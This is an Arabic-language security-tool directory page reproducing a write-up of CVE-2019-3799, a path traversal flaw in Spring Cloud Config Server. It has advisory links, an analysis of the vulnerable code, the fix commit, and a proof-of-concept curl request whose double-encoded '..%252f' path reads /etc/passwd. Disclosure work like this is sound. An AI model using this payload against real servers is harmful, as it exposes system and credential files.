Skip to content
KitploitKITPLOIT
أدواتالمدونة
Log in
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2019-3799 — CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6 | Kitploit
أدوات/GitHubGitHub/mpgn/cve-2019-3799
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubmpgn/cve-2019-3799

CVE-2019-3799

CVE-2019-3799 - Spring Cloud Config Server: Directory Traversal < 2.1.2, 2.0.4, 1.4.6

عرض المستودع
3154منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2019-3799 - اجتياز الدليل في Spring-Cloud-Config-Server < 2.1.2, 2.0.4, 1.4.6

خادم تكوين Spring Cloud معرض لاجتياز الدليل / اجتياز المسار / كشف محتوى الملف < 2.1.2, 2.0.4, 1.4.6

Spring Cloud Config، الإصدارات 2.1.x قبل 2.1.2، والإصدارات 2.0.x قبل 2.0.4، والإصدارات 1.4.x قبل 1.4.6، والإصدارات القديمة غير المدعومة تسمح للتطبيقات بخدمة ملفات تكوين عشوائية من خلال وحدة spring-cloud-config-server. يمكن لمستخدم ضار أو مهاجم إرسال طلب باستخدام عنوان URL مصمم خصيصًا يمكن أن يؤدي إلى هجوم اجتياز الدليل.

capture d'écran_1

عُثر عليه بواسطة Vern ([email protected])

استشارة أمنية

  • https://pivotal.io/security/cve-2019-3799
  • https://spring.io/blog/2019/04/17/cve-2019-3799-spring-cloud-config-2-1-2-2-0-4-1-4-6-released

تحليل فني

  • https://chybeta.github.io/2019/04/18/%E3%80%90CVE-2019-3799%E3%80%91-Directory-Traversal-with-spring-cloud-config-server/

إثبات المفهوم

  1. قم بتنزيل إصدار ضعيف من Spring Cloud Config https://github.com/spring-cloud/spring-cloud-config
  2. قم بتشغيل التطبيق
cd spring-cloud-config-server                                                                                                                                                                     
../mvnw spring-boot:run
  1. استغلال
curl http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd                                                                                                    

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

الثغرة

كما هو الحال دائمًا، من خلال قراءة الوثائق يمكننا العثور على المعلومات ذات الصلة:

خدمة ملف نصي عادي: https://cloud.spring.io/spring-cloud-static/spring-cloud-config/1.3.1.RELEASE/#_serving_plain_text

يوفر خادم التكوين هذه من خلال نقطة نهاية إضافية على /{name}/{profile}/{label}/{path} حيث يكون لـ "name" و "profile" و "label" نفس معنى نقطة نهاية البيئة العادية، ولكن "path" هو اسم ملف (مثل log.xml).

يوفر الخادم هذه من خلال نقطة نهاية إضافية على /{name}/{profile}/{label}/{path}

معلومة أخرى مثيرة للاهتمام من الوثيقة:

مع الخلفيات المستندة إلى VCS (git, svn) يتم سحب الملفات أو استنساخها إلى نظام الملفات المحلي. بشكل افتراضي يتم وضعها في الدليل المؤقت للنظام ببادئة config-repo-. على لينكس، على سبيل المثال يمكن أن يكون /tmp/config-repo-

ماذا يحدث عندما نرسل http://127.0.0.1:8888/test/pathtraversal/master/..%252f..%252f..%252f..%252f../etc/passwd

  1. يتم تعيين الطلب باستخدام

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L71

@RequestMapping("/{name}/{profile}/{label}/**")
public String retrieve(@PathVariable String name, @PathVariable String profile,
    @PathVariable String label, ServletWebRequest request,
    @RequestParam(defaultValue = "true") boolean resolvePlaceholders)
    throws IOException {
  String path = getFilePath(request, name, profile, label);
  return retrieve(request, name, profile, label, path, resolvePlaceholders);
}
  1. الدالة retrieve تستدعي الدالة findOne

https://github.com/spring-cloud/spring-cloud-config/blob/3c0348ca624f9f3b370797799a3608840fed2d8b/spring-cloud-config-server/src/main/java/org/springframework/cloud/config/server/resource/ResourceController.java#L103

synchronized String retrieve(ServletWebRequest request, String name, String profile,
    String label, String path, boolean resolvePlaceholders) throws IOException {
  name = resolveName(name);
  label = resolveLabel(label);
  Resource resource = this.resourceRepository.findOne(name, profile, label, path); // path: ..%2f..%2f..%2f..%2f..%2f../etc/passwd
  if (checkNotModified(request, resource)) {
    // Content was not modified. Just return.
    return null;
  }
  // ensure InputStream will be closed to prevent file locks on Windows
  try (InputStream is = resource.getInputStream()) {
    String text = StreamUtils.copyToString(is, Charset.forName("UTF-8"));
    if (resolvePlaceholders) {
      Environment environment = this.environmentRepository.findOne(name,
          profile, label);
      text = resolvePlaceholders(prepareEnvironment(environment), text);
    }
    return text;
  }
}
  1. يتم استدعاء الدالة findOne:
public synchronized Resource findOne(String application, String profile, String label, String path) {
  if (StringUtils.hasText(path)) {
    String[] locations = this.service.getLocations(application, profile, label).getLocations(); // /tmp/config-repo-<randomid>
    try {
      for (int i = locations.length; i-- > 0; ) {
        String location = locations[i]; // [1]..%2f..%2f..%2f..%2f..%2f../etc/passwd
        for (String local : getProfilePaths(profile, path)) {
            Resource file = this.resourceLoader.getResource(location).createRelative(local); // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            if (file.exists() && file.isReadable()) {
                return file; // /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd
            }
          }
        }
      }
    }
    catch (IOException e) {
        throw new NoSuchResourceException(
                "Error : " + path + ". (" + e.getMessage() + ")");
    }
  }
  throw new NoSuchResourceException("Not found: " + path);
}
  1. ثم تقوم الدالة retrieve بقراءة الملف باستخدام StreamUtils.copyToString(is, Charset.forName("UTF-8") الذي يحول /tmp/config-repo-<randomid>/..%2f..%2f..%2f..%2f..%2f../etc/passwd إلى /etc/passwd مما يؤدي إلى كشف محتوى الملف /etc/passwd

capture d'écran_4


الإصلاح: https://github.com/spring-cloud/spring-cloud-config/commit/3632fc6f64e567286c42c5a2f1b8142bfde505c2

capture d'écran

From 3632fc6f64e567286c42c5a2f1b8142bfde505c2 Mon Sep 17 00:00:00 2001
From: Spencer Gibb <[email protected]>
Date: Tue, 2 Apr 2019 14:16:10 -0400
Subject: [PATCH] Cleans invalid paths

fixes gh-1355
---
 .../resource/GenericResourceRepository.java   | 165 ++++++++++++++++--
 .../GenericResourceRepositoryTests.java       |  18 ++
 2 files changed, 170 insertions(+), 13 deletions(-)
تنزيل الأداة